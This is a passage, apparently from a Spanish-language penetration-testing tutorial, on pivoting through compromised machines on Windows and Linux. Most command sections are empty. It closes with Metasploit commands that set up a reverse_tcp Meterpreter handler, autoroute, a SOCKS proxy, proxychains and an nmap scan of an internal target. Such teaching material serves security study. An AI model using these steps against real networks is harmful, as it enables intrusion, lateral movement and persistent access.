Utilizar una máquina comprometida para pivotar a una segunda máquina, y luego usar la segunda máquina para pivotar a una tercera.
Triple Pivoting:
Extender el concepto de doble pivoting para incluir una tercera capa de pivote, lo que permite acceder a una red o sistema adicional a través de múltiples máquinas comprometidas.
Importancia del Pivoting
Acceso a Redes Segregadas: Permite acceder a redes internas que están segregadas del punto de entrada inicial, lo cual es común en entornos empresariales.
Movimiento Lateral: Facilita el movimiento lateral dentro de la red, permitiendo comprometer otros sistemas y servicios.
Persistencia: Ayuda a establecer persistencia en la red, permitiendo al atacante mantener el acceso incluso si se detecta y remedia el punto de entrada inicial.
Configuración de Pivoting en Windows y Linux
La configuración de pivoting puede variar dependiendo del sistema operativo de la máquina comprometida. A continuación se detallan los aspectos teóricos y comandos útiles para configurar pivoting en Windows y Linux.
Pivoting en Windows
En Windows, el pivoting a menudo se realiza utilizando herramientas como Metasploit, Netcat, y PowerShell. La configuración de pivotes en Windows se puede dividir en varias etapas:
1. Establecer una Sesión Meterpreter
Teoría: Meterpreter es un payload avanzado que se utiliza dentro del framework Metasploit para ejecutar comandos en la máquina objetivo.
Comandos:
2. Configurar un Route
Teoría: La función autoroute de Meterpreter permite agregar rutas a la tabla de enrutamiento, lo que facilita el redireccionamiento del tráfico a través de la máquina comprometida.
Comandos:
3. Usar Socks Proxy
Teoría: Configurar un proxy SOCKS en Metasploit permite enrutar el tráfico de herramientas de red a través de la máquina comprometida.
Comandos:
4. Configurar ProxyChains
Teoría:ProxyChains se utiliza en la máquina atacante para redirigir el tráfico de herramientas de red a través del proxy SOCKS configurado en Metasploit.
Comandos:
Pivoting en Linux
En Linux, el pivoting se puede realizar utilizando herramientas como SSH, Netcat, y Metasploit. La configuración de pivotes en Linux también se puede dividir en varias etapas:
1. Establecer un Túnel SSH
Teoría:Un túnel SSH se utiliza para redirigir el tráfico a través de una conexión SSH segura.
Comandos:
2. Usar ProxyChains
Teoría: ProxyChains se utiliza en la máquina atacante para redirigir el tráfico de herramientas de red a través del túnel SSH.
Comandos:
3. Configuración de Metasploit
Teoría: Meterpreter y autoroute en Metasploit permiten enrutar el tráfico a través de la máquina comprometida.
use exploit/multi/handler
set payload linux/x86/meterpreter/reverse_tcp
set LHOST <your_IP>
set LPORT <your_port>
exploit
meterpreter > run autoroute -s <internal_network>/24
use auxiliary/server/socks4a
set SRVHOST 0.0.0.0
set SRVPORT 1080
run
echo "socks4 127.0.0.1 1080" >> /etc/proxychains.conf
proxychains nmap -sT -Pn -n -p 80,443 <target_internal_IP>